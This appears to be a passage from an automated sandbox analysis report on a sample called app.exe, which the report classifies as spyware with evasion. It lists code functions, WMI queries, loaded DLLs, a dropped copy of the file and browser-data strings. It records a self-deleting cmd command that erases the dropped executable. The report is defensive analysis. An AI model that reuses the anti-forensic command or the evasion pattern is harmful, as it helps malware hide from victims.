Source: C:\Users\user\Desktop\app.exeCode function: 0_2_004077F6
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00409A38
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00412AC0
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00425B56
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00407DBE
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00404E54
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00418E0E
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0257A020
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025D91D2
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025801BB
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025BE5F7
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0259AA16
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_02583ABA
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025D1862
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_02591E40
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0259BD08
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025D3239
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025A3224
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025A0225
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025B72D7
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025C42F5
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025A628E
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025CF340
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025D430E
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_02566320
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025D632B
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025A53DD
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025ED3D0
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025DD3C0
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0258C38E
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025E3389
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025F13BD
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025A3001
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025BE030
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025D20E3
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0257B090
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025EE16F
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025AB13B
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_02563130
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0256B1F0
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025B1180
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0256A1B0
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025811A0
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_02562670
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025EE605
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0257B695
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025C0690
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025AC6AE
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_02577754
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0257771C
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0257670C
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_02563790
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_02582449
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025A6468
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_02563400
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025B74D0
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025B34D6
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0256B4C0
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025EF4C2
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0256E490
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025A4544
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025D352A
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025985C9
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025D85F4
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_02598A44
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025A4A88
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0258BAB0
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_02586B58
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025A2B5E
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_02561B50
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0256BB50
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025D1B40
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0258DB7B
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0258EB69
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025B6B1B
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025EBB18
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0256AB90
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0259585F
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025ED844
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0256F8EC
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025D3890
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025648A0
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025B98A5
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_02569950
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_02573962
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0257799F
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025C1E40
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025F0E40
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_3_0552C3BF
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02570225
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0255C38E
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025A91D2
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025501BB
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025511A0
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0258E5F7
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0256AA16
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02574A88
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02553ABA
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02556B58
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0255DB7B
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0255EB69
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0256585F
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025A1862
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025898A5
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02561E40
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0255AE37
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02557C6F
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02553C05
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02584D4A
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0256BD08
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025A3239
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02573224
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025872D7
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025942F5
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0257628E
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0259F340
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025A430E
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025A632B
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02536320
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025753DD
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025BD3D0
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025AD3C0
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025B3389
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025C13BD
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02573001
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0258E030
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0254A020
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025A20E3
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0254B090
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025BE16F
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02533130
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0257B13B
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0253B1F0
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02581180
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0253A1B0
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02532670
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025BE605
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0254B695
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02590690
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0257C6AE
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02547754
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0254771C
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0254670C
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02533790
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02552449
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02576468
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02533400
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025874D0
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025834D6
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0253B4C0
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025BF4C2
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0253E490
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02574544
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025A352A
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025685C9
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025A85F4
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02568A44
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0255BAB0
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02531B50
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0253BB50
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02572B5E
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025A1B40
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025BBB18
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02586B1B
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0253AB90
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025BD844
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0253F8EC
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025A3890
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025348A0
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02539950
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02543962
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0254799F
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02591E40
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025C0E40
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02587E74
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02579E36
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02536EC0
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02586ECC
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02557EF1
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0257DEE0
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02586F5B
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0257CF7C
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02542F21
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02542C6E
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02580C00
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02567C09
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025A5CD3
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02586CC5
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025BDCE6
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02532C90
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02557CA3
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025BFCA7
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02572D42
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02577D14
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02578D25
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02594DD0
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02586DD2
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe E9BC44CF548A70E7285499209973FAF44B7374DECE1413DFCDC03BF25A6C599C
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: String function: 025BCAF0 appears 156 times
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: String function: 02533D50 appears 96 times
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: String function: 025ADE90 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: String function: 025BC9A0 appears 60 times
Source: C:\Users\user\Desktop\app.exeCode function: String function: 00416398 appears 132 times
Source: C:\Users\user\Desktop\app.exeCode function: String function: 025ECAF0 appears 112 times
Source: C:\Users\user\Desktop\app.exeCode function: String function: 00416EF8 appears 50 times
Source: C:\Users\user\Desktop\app.exeCode function: String function: 025EC9A0 appears 45 times
Source: C:\Users\user\Desktop\app.exeCode function: String function: 02563D50 appears 73 times
Source: app.exe, 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename vs app.exe
Source: app.exe, 00000003.00000000.2681579898.000000000044D000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: OriginalFilename vs app.exe
Source: app.exeBinary or memory string: OriginalFilename vs app.exe
Source: app.exe.0.drBinary or memory string: OriginalFilename vs app.exe
Source: app.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: app.exe.0.drBinary string: Could not open \device\physicalmemory
Source: app.exe.0.drBinary string: Could not map view of %X length %XCould not open \device\physicalmemory\device\physicalmemoryRtlNtStatusToDosErrorNtMapViewOfSectionNtOpenSectionNtUnmapViewOfSectionntdll.dllRtlInitUnicodeString%c
Source: classification engineClassification label: mal100.spyw.evad.winEXE@10/6@1/2
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025C2A50 GetModuleHandleW,FormatMessageW,GetLastError,HeapFree,
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0040A130 GetVersionExA,CoCreateInstance,CoSetProxyBlanket,VariantInit,lstrlenW,lstrcpynA,WideCharToMultiByte,
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00423119 EnableWindow,GetActiveWindow,SetActiveWindow,FreeResource,
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7152:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5108:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7972:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5108:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7972:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7152:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeMutant created: \Sessions\1\BaseNamedObjects\hrzbaov
Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\7041956494665639546Jump to behavior
Source: app.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: C:\Users\user\Desktop\app.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Process
Source: C:\Users\user\Desktop\app.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Processor
Source: C:\Users\user\Desktop\app.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\app.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: app.exe, 00000003.00000003.3188734917.00000000058E1000.00000004.00000020.00020000.00000000.sdmp, Web Data.3.drBinary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
Source: app.exeVirustotal: Detection: 11%
Source: C:\Users\user\Desktop\app.exeFile read: C:\Users\user\Desktop\app.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\app.exe "C:\Users\user\Desktop\app.exe"
Source: C:\Users\user\Desktop\app.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\app.exeProcess created: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe "C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe"
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c timeout /t 5 & del /f /q C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe && exit
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 5
Source: C:\Users\user\Desktop\app.exeProcess created: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe "C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe"
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c timeout /t 5 & del /f /q C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe && exit
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 5
Source: C:\Users\user\Desktop\app.exeSection loaded: apphelp.dll
Source: C:\Users\user\Desktop\app.exeSection loaded: oledlg.dll
Source: C:\Users\user\Desktop\app.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\app.exeSection loaded: oleacc.dll
Source: C:\Users\user\Desktop\app.exeSection loaded: edgegdi.dll
Source: C:\Users\user\Desktop\app.exeSection loaded: uxtheme.dll
Source: C:\Users\user\Desktop\app.exeSection loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\app.exeSection loaded: ncrypt.dll
Source: C:\Users\user\Desktop\app.exeSection loaded: ntasn1.dll
Source: C:\Users\user\Desktop\app.exeSection loaded: cryptbase.dll
Source: C:\Users\user\Desktop\app.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\app.exeSection loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\app.exeSection loaded: amsi.dll
Source: C:\Users\user\Desktop\app.exeSection loaded: userenv.dll
Source: C:\Users\user\Desktop\app.exeSection loaded: profapi.dll
Source: C:\Users\user\Desktop\app.exeSection loaded: version.dll
Source: C:\Users\user\Desktop\app.exeSection loaded: ntmarta.dll
Source: C:\Users\user\Desktop\app.exeSection loaded: windows.storage.dll
Source: C:\Users\user\Desktop\app.exeSection loaded: wldp.dll
Source: C:\Users\user\Desktop\app.exeSection loaded: propsys.dll
Source: C:\Users\user\Desktop\app.exeSection loaded: edputil.dll
Source: C:\Users\user\Desktop\app.exeSection loaded: urlmon.dll
Source: C:\Users\user\Desktop\app.exeSection loaded: iertutil.dll
Source: C:\Users\user\Desktop\app.exeSection loaded: srvcli.dll
Source: C:\Users\user\Desktop\app.exeSection loaded: netutils.dll
Source: C:\Users\user\Desktop\app.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\app.exeSection loaded: sspicli.dll
Source: C:\Users\user\Desktop\app.exeSection loaded: wintypes.dll
Source: C:\Users\user\Desktop\app.exeSection loaded: appresolver.dll
Source: C:\Users\user\Desktop\app.exeSection loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\app.exeSection loaded: slc.dll
Source: C:\Users\user\Desktop\app.exeSection loaded: sppc.dll
Source: C:\Users\user\Desktop\app.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\app.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: oledlg.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: oleacc.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: edgegdi.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeSection loaded: ondemandconnroutehelper.dll
